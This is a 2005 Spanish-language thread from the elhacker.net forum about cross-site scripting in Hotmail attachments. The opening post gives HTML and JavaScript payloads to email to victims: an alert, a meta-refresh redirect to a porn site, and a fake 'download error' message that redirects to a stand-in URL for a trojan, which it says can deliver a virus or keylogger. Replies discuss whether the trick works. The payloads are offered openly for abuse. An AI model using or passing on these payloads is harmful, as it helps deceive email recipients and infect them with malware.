elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 22:43  


Tema destacado: [Overclocking] Récords de overclock del foro

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  XSS en Hotmail...!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: XSS en Hotmail...!  (Leído 5,384 veces)
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
XSS en Hotmail...!
« en: 17 Abril 2005, 20:05 »

Enaz! visitando distintos foros, observe que existe la posibilidad de probar XSS en hotmail, lo cual consiste en hacer un simple codigo en javascript en bloc de notas y guardalo con la extensión de una imagen ( jpg, gif).

Ejemplo:

<script language="javascript">
alert('Mousehack was here');
</script>

una vez guardado en el block de notas, se lo envia por mail a quien quiera, que al descargar el adjunto se ejecutara el codigo.

Q se puede hacer con esto? depende de la creatividad de cada uno por ej:

<META HTTP-EQUIV="Refresh" CONTENT='1;URL=http://paginaporno.com '>

este code hace que se redireccione a una pagina, en este caso una porno, pero puede ser tu pagina u otras...

<script language="javascript">
alert('Error, se intentara descargar de nuevo');
</script>
<META HTTP-EQUIV="Refresh" CONTENT="3;URL=http://pagina.com/troyano.exe">

este code aparenta que da un error en la descarga y redirecciona a una pagina donde podes poner un troyano, virus, keylogger,etc

Existen otras posibilidades, depende de vuestra inventiva... ;)

Fuente: PerrosHackers

Salu2


En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Dj_Hell

Desconectado Desconectado

Mensajes: 54


UDP.pl


Ver Perfil WWW
Re: XSS en Hotmail...!
« Respuesta #1 en: 17 Abril 2005, 22:52 »

Tiene buena pinta eso, estoy empezando a dejar correr la imaginacion... xD voy a probar

Salu2
En línea
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 17.232


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: XSS en Hotmail...!
« Respuesta #2 en: 17 Abril 2005, 22:59 »

Junio 2003
HOTMAIL XSS and AV bypass exploit
http://foro.elhacker.net/index.php/topic,13947.0.html

Julio 2004
XSS en Hotmail
http://foro.elhacker.net/index.php/topic,35704.0.html

Febrero 2005
Nueva vulnerabilidad en Hotmail
http://foro.elhacker.net/index.php/topic,58021.0.html
En línea

"elhacker.net es único, por eso no fabrica para otras marcas"  - Prohibido prohibir

CdbRwS

Desconectado Desconectado

Mensajes: 183


[ Made In San Luis ]


Ver Perfil
Re: XSS en Hotmail...!
« Respuesta #3 en: 18 Abril 2005, 00:33 »

Citar
<script language="javascript">
alert('Error, se intentara descargar de nuevo');
</script>
<META HTTP-EQUIV="Refresh" CONTENT="3;URL=http://pagina.com/troyano.exe">


mousehack lo probastes a ese codigo?

probalo.. no anda

Citar
<META HTTP-EQUIV="Refresh" CONTENT="3;URL=http://pagina.com/troyano.exe">

 

En línea


[ C d b R w S ]
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: XSS en Hotmail...!
« Respuesta #4 en: 18 Abril 2005, 03:45 »

Citar
<script language="javascript">
alert('Error, se intentara descargar de nuevo');
</script>
<META HTTP-EQUIV="Refresh" CONTENT="3;URL=http://pagina.com/troyano.exe">


mousehack lo probastes a ese codigo?

probalo.. no anda

Citar
<META HTTP-EQUIV="Refresh" CONTENT="3;URL=http://pagina.com/troyano.exe">

 


pues a mi me funciono perfectamente...

prueba con enviarlo poniendo esto...

<script language="javascript">
alert('Error, se intentara descargar de nuevo');
</script>
<META HTTP-EQUIV="Refresh" CONTENT="1;URL=http://ciberia.ya.com/webmousehack/owned.txt">

y fijate q te llega como correo no deseado.

el-brujo sorry no me fije si el tema ya fue posteado, para la proxima ...

Salu2

En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines